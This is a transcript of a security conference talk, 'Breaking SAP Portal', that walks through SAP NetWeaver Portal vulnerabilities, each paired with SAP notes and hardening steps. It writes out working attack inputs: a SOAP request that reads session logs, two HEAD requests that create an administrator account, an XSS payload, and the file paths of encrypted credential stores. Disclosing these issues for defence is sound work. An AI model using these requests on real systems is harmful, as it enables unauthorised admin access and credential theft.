breaking sap portal (hashdays)
TRANSCRIPT
![Page 1: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/1.jpg)
Invest in security to secure investments
Breaking SAP Portal
Alexander Polyakov CTO ERPScan
![Page 2: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/2.jpg)
About ERPScan
• The only 360-‐degree SAP Security solu8on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presentaEons key security conferences worldwide • 25 Awards and nominaEons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
![Page 3: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/3.jpg)
Agenda
• Say hello to SAP Portal • Breaking Portal through SAP Services • Breaking Portal through J2EE Engine • Breaking Portal through Portal issues • ERPScan SAP Pentes8ng Tool password decrypt module • Conclusion
3
![Page 4: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/4.jpg)
SAP
• The most popular business applica8on • More than 180000 customers worldwide • 74% of Forbes 500 run SAP
4
![Page 5: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/5.jpg)
Meet sapscan.com
hUp://erpscan.com/wp-‐content/uploads/2012/06/SAP-‐Security-‐in-‐figures-‐a-‐global-‐survey-‐2007-‐2011-‐final.pdf
5
![Page 6: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/6.jpg)
Say hello to Portal
• Point of web access to SAP systems • Point of web access to other corporate systems • Way for aUackers to get access to SAP from the Internet • ~17 Portals in Switzerland, according to Shodan • ~11 Portals in Switzerland, according to Google
6
![Page 7: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/7.jpg)
EP architecture
7
![Page 8: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/8.jpg)
Okay, okay. SAP Portal is important, and it has many links to other modules. So what?
8
![Page 9: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/9.jpg)
SAP Management Console
9
![Page 10: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/10.jpg)
SAP Management Console
• SAP MC provides a common framework for centralized system management
• Allowing to see the trace and log messages • Using JSESSIONID from logs, aUacker can log into Portal
What we can find into logs?
10
Right! File userinterface.log contains calculated JSESIONID
But…aUacker must have creden8al for reading log file!
Wrong!
![Page 11: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/11.jpg)
SAP Management Console
<?xml version="1.0"?> <SOAP-‐ENV:Envelope xmlns:SOAP-‐ENV="hUp://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="hUp://
www.w3.org/2001/XMLSchema-‐instance" xmlns:xs="hUp://www.w3.org/2001/XMLSchema"> <SOAP-‐ENV:Header> <sapsess:Session xmlns:sapsess="hUp://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-‐ENV:Header> <SOAP-‐ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/userinterface.log</filename> <filter/> <language/> <maxentries>%COUNT%</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-‐ENV:Body> </SOAP-‐ENV:Envelope>
11
![Page 12: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/12.jpg)
PrevenEon
Don’t use TRACE_LEVEL = 3 in produc8on systems or delete traces
hUp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
12
![Page 13: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/13.jpg)
13
Single-‐Sign On
![Page 14: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/14.jpg)
SSO (old but sEll works)
• SAP implements SSO using the Header Variable Login Module
creden8als
check
okay cookie
AUacker
header_auth
cookie
tnx Mariano ;)
14
![Page 15: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/15.jpg)
PrevenEon
• Implement proper network filters to avoid direct connec8ons to SAP • J2EE Engine. If you use it for Windows authen8ca8on, switch to SPNegoLoginModule
hUp://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/a3d940c2653126e10000000a1550b0/frameset.htm
15
![Page 16: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/16.jpg)
16
SAP NetWeaver J2EE
![Page 17: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/17.jpg)
Access control
Web Dynpro -‐ programma8c Portal iViews -‐ programma8c J2EE Web apps -‐ declara8ve
ProgrammaEc By UME
DeclaraEve By WEB.XML
17
![Page 18: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/18.jpg)
DeclaraEve access control
• The central en8ty in the J2EE authoriza8on model is the security role.
• Programmers define the applica8on-‐specific roles in the J2EE deployment descriptor
web.xml web-‐j2ee-‐engine.xml
18
![Page 19: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/19.jpg)
19
Verb Tampering
![Page 20: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/20.jpg)
web.xml
<servlet> <servlet-‐name>Cri8calAc8on</servlet-‐name> <servlet-‐class>com.sap.admin.Cri8cal.Ac8on</servlet-‐class> </servlet> <servlet-‐mapping> <servlet-‐name>Cri8calAc8on</</servlet-‐name> <url-‐paUern>/admin/cri8cal</url-‐paUern> </servlet-‐mapping <security-‐constraint> <web-‐resource-‐collec8on> <web-‐resource-‐name>Restrictedaccess</web-‐resource-‐name> <url-‐paUern>/admin/*</url-‐paUern> <hUp-‐method>GET</hUp-‐method> </web-‐resource-‐collec8on> <auth-‐constraint> <role-‐name>administrator</role-‐name> </auth-‐constraint> </security-‐constraint>
20
![Page 21: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/21.jpg)
Verb Tampering
• If we are trying to get access to an applica8on using GET – we need a login:pass and administrator role
• What if we try to get access to applica8on using HEAD instead GET?
• PROFIT!
• Did U know about ctc?
21
![Page 22: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/22.jpg)
Verb Tampering
Need Admin account in SAP Portal? Just send two HEAD requests
• Create new user blabla:blabla HEAD /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
• Add user blabla to group Administrators HEAD /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators
Works when UME uses JAVA database
22
![Page 23: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/23.jpg)
PrevenEon
• Install SAP notes 1503579,1616259 • Install other SAP notes about Verb Tampering • Scan applica8ons with ERPScan WEB.XML checker • Disable the applica8ons that are not necessary
23
![Page 24: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/24.jpg)
24
Invoker servlet
![Page 25: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/25.jpg)
web.xml
<servlet> <servlet-‐name>Cri>calAc>on</servlet-‐name> <servlet-‐class>com.sap.admin.Cri>cal.Ac>on</servlet-‐class> </servlet> <servlet-‐mapping> <servlet-‐name>Cri>calAc>on</</servlet-‐name> <url-‐paBern>/admin/cri>cal</url-‐paBern> </servlet-‐mapping <security-‐constraint> <web-‐resource-‐collec>on> <web-‐resource-‐name>Restrictedaccess</web-‐resource-‐name> <url-‐paBern>/admin/*</url-‐paBern> <hBp-‐method>GET</hBp-‐method> <hBp-‐method>HEAD</hBp-‐method> </web-‐resource-‐collec>on> <auth-‐constraint> <role-‐name>administrator</role-‐name> </auth-‐constraint> </security-‐constraint>
GET /admin/cri8cal/Cri>calAc>on
GET /servlet/com.sap.admin.Cri8cal.Ac8on
25
![Page 26: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/26.jpg)
Invoker Servlet
• Want to execute an OS command on J2EE server remotely? • Maybe upload a backdoor in a Java class? • Or sniff all traffic ?
S8ll remember ctc?
26
![Page 27: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/27.jpg)
Invoker Servlet
27
![Page 28: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/28.jpg)
PrevenEon
• Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” must be “false” • Check all WEB.XML files with ERPScan WEBXML checker
28
![Page 29: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/29.jpg)
So, where is Portal?
29
![Page 30: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/30.jpg)
SAP Portal
• User access rights to objects are in the Portal Content Directory (PCD)
• Based on ACL • 2 types of access:
– (design 8me) for administrators – (run8me) for users
30
![Page 31: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/31.jpg)
Portal Permission Levels
31
![Page 32: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/32.jpg)
End User permission
The objects where end user permission is enabled affect the following areas in Portal: – All Portal Catalog obj with end user permission – Authorized Portal users may access restricted Portal components by URL without an intermediate iView if they are granted permission in the appropriate security zone.
32
![Page 33: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/33.jpg)
Administrator permission
• Owner = full control + modify permissions • Full control = read/write + delete obj • Read/Write = read+write+edit proper8es+ add/rem child • Write (folders only) = create objects • Read = view obj+create instances
(delta links and copies) • None = access not granted
33
![Page 34: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/34.jpg)
Role Assigner permission
• The Role Assigner permission seyng is available for role objects • It allows you to determine which Portal users are permiUed to
assign other users, groups, or roles to the role principle using the Role Assignment tool
34
![Page 35: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/35.jpg)
Security Zones
• Security zones allow the system administrator to control which Portal components and Portal services a Portal user can launch
• A security zone specifies the vendor ID, the security area, and safety level for each Portal component and Portal service
• The security zone is defined in a Portal applica8on descriptor XML file • A Portal component or service can only belong to one security zone;
however, Portal components and services may share the same safety level • Zones allows the administrator to assign permissions to a safety level,
instead of assigning them directly to each Portal component or service
35
Why? To group mul>ple iViews easily
![Page 36: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/36.jpg)
36
We can get access to Portal iViews using direct URL:
/irj/servlet/prt/portal/prtroot/<iView_ID>
And only Security Zone rights will be checked
![Page 37: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/37.jpg)
Security Zones
• So, SecZones offer an extra, but op8onal, layer of code-‐level security to iViews – User-‐> check ”end user” permission to the role-‐> view iView – User-‐> check ”end user” permission to the role-‐> check ”end user” permission to the SecZone -‐> view iView
By default, this func8onality is disabled
37
![Page 38: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/38.jpg)
38
So I wonder how many Portal applica8ons with No\Low Safety
exist?
![Page 39: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/39.jpg)
Safety Levels for Security Zone
• No Safety – Anonymous users are permiUed to access portal components defined in
the security zone. • Low Safety
– A user must be at least an authen8cated portal user to access portal components defined in the security zone.
• Medium Safety – A user must be assigned to a par8cular portal role that is authorized to
access portal components defined in the security zone • High Safety
– A user must be assigned to a portal role with higher administra8ve rights that is authorized to access portal components defined in the security zone.
39
![Page 40: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/40.jpg)
No safety zone
Many custom applica8ons with low security level zone
40
![Page 41: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/41.jpg)
PrevenEon
Check security zones permissions
• hUp://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm • hUp://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm
41
![Page 42: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/42.jpg)
SAP Portal
• Web based services • All OWASP TOP10 actual
– XSS – Phishing – Traversal – XXE – …
42
![Page 43: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/43.jpg)
43
EPCF
![Page 44: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/44.jpg)
XSS
• Many XSSs in Portal
• But some8mes “hUponly” • But when we exploit XSS, we can use the features of SAP Portal
44
![Page 45: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/45.jpg)
45
<SCRIPT> alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"); </SCRIPT>
![Page 46: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/46.jpg)
EPCF
EPCF provides a JavaScript API designed for the client-‐side communica8on between portal components and the portal core framework
• Enterprise Portal Client Manager (EPCM) • iViews can access the EPCM object from every portal page
or IFrame • Every iView contains the EPCM object • For example, EPCF used for transient user data buffer for iViews
46
![Page 47: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/47.jpg)
PrevenEon
Install SAP note 1656549
47
![Page 48: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/48.jpg)
KM Phishing
SAP Knowledge Management may be used to create phishing pages
48
![Page 49: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/49.jpg)
49
FIX
![Page 50: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/50.jpg)
Directory traversal
50
![Page 51: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/51.jpg)
Directory traversal fix bypass
51
![Page 52: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/52.jpg)
PrevenEon
Install SAP note 1630293
52
![Page 53: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/53.jpg)
53
Cut the Crap, Show Me the Hack
![Page 54: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/54.jpg)
Breaking SAP Portal
• Found a file in the OS of SAP Portal with the encrypted passwords for administra8on and DB
• Found a file in the OS of SAP Portal with keys to decrypt passwords
• Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
• Decrypt passwords and log into Portal • PROFIT!
54
![Page 55: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/55.jpg)
Read file
How we can read the file?
– Directory Traversal – OS Command execute – XML External En8ty (XXE)
55
![Page 56: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/56.jpg)
XXE in Portal
56
![Page 57: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/57.jpg)
XXE in Portal
57
![Page 58: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/58.jpg)
XXE
Error based XXE
58
![Page 59: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/59.jpg)
Breaking SAP Portal
• Ok, we can read files • Where are the passwords? • The SAP J2EE Engine stores the database user SAP<SID>DB; its
password is here: \usr\sap\<SID>\SYS\global\security\data\SecStore.proper>es
59
![Page 60: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/60.jpg)
Where are the passwords? (config.proper<es)
rdbms.maximum_connec8ons=5 system.name=TTT secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/
SecStore.proper8es secstorefs.lib=/oracle/TTTsapmnt/global/security/lib rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar rdbms.connec8on=jdbc/pool/TTT rdbms.ini8al_connec8ons=1
60
![Page 61: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/61.jpg)
Where are the passwords? (config.proper<es)
rdbms.maximum_connec8ons=5 system.name=TTT secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper8es secstorefs.lib=/oracle/TTTsapmnt/global/security/lib rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar rdbms.connec8on=jdbc/pool/TTT rdbms.ini8al_connec8ons=1
61
![Page 62: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/62.jpg)
62
But where is the key?
![Page 63: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/63.jpg)
SecStore.properEes
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp
+QD04b0Fh jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ $internal/check=BJRrz�eUA+bw4XCzdz16zX78u�t $internal/mode=encrypted admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
63
![Page 64: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/64.jpg)
config.properEes
rdbms.maximum_connec8ons=5 system.name=TTT secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper8es secstorefs.lib=/oracle/TTTsapmnt/global/security/lib rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar rdbms.connec8on=jdbc/pool/TTT rdbms.ini8al_connec8ons=1
64
![Page 65: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/65.jpg)
Get the password
• We have an encrypted password • We have a key to decrypt it
We got the J2EE admin and JDBC login:password!
65
![Page 66: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/66.jpg)
PrevenEon
• Install SAP note 1619539 • Restrict read access to files SecStore.properEes and SecStore.key
66
![Page 67: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/67.jpg)
Portal post exploitaEon
• Lot of links to other systems in corporate LAN • Using SSRF, aUackers can get access to these systems
What is SSRF?
67
![Page 68: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/68.jpg)
SSRF History: Basics
• We send Packet A to Service A • Service A ini8ates Packet B to service B • Services can be on the same or different hosts • We can manipulate some fields of packet B within packet A • Various SSRF aUacks depend on how many fields we can
control on packet B
Packet A
Packet B
68
![Page 69: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/69.jpg)
ParEal Remote SSRF: HTTP aeacks on other services
HTTP Server Corporate network
Direct aUack GET /vuln.jsp
SSRF AUack
SSRF AUack Get /vuln.jst
A B
69
![Page 70: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/70.jpg)
Gopher uri scheme
• Using gopher:// uri scheme, it is possible to send TCP packets – Exploit OS vulnerabili8es – Exploit old SAP applicaEon vulnerabiliEes – Bypass SAP security restric8ons – Exploit vulnerabili8es in local services
More info in our BH2012 presenta8on: SSRF vs. Business Cri>cal Applica>ons
hUp://erpscan.com/wp-‐content/uploads/2012/08/SSRF-‐vs-‐Businness-‐cri8cal-‐applica8ons-‐whitepaper.pdf
70
![Page 71: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/71.jpg)
Portal post-‐exploitaEon
71
![Page 72: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/72.jpg)
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure
It’s all in your hands
SAP Guides Regular security assessments
ABAP code review
Monitoring technical security
SegregaEon of DuEes
72
![Page 73: Breaking SAP portal (HashDays)](https://reader034.vdocuments.site/reader034/viewer/2022042615/55d0f6e9bb61eb8b788b47d2/html5/thumbnails/73.jpg)
Future work
Many of the researched issues cannot be disclosed now because of our good rela>onship with SAP Security Response Team, whom I would like to thank for coopera>on. However, if you want to be the first to see new aBacks and demos, follow us at @erpscan and aBend future presenta>ons:
• November 9 – POC (Korea, Seoul) • November 20 – ZeroNights (Russia, Moscow) • November 29 – DeepSEC (Austria, Vienna)
73